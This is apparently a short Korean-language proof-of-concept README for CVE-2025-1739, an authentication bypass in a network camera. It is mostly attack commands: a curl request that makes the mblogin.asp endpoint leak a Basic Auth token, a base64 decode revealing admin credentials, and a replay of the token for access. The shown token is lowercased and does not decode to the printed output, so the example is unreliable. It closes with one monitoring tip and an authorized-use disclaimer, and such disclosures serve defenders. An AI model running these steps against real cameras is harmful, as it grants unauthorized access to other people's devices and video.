
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | 점수 | CWE | 유형 |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | Basic Auth 누출을 통한 인증 우회 |
카메라는 mblogin.asp 엔드포인트를 통해 유효한 Base64 인코딩 Basic Authentication 토큰을 유출합니다. 이 토큰은 쉽게 디코딩하여 재사용할 수 있으므로 비밀번호를 알 필요 없이 장치에 대한 무단 액세스를 얻는 데 악용될 수 있습니다.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
응답에는 유효한 Basic Auth 토큰이 포함되어 있습니다:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp 및 mblogin.asp에 대한 예기치 않은 액세스를 모니터링하십시오.이 저장소는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 장치를 테스트하기 전에 항상 명시적 허가를 받으십시오.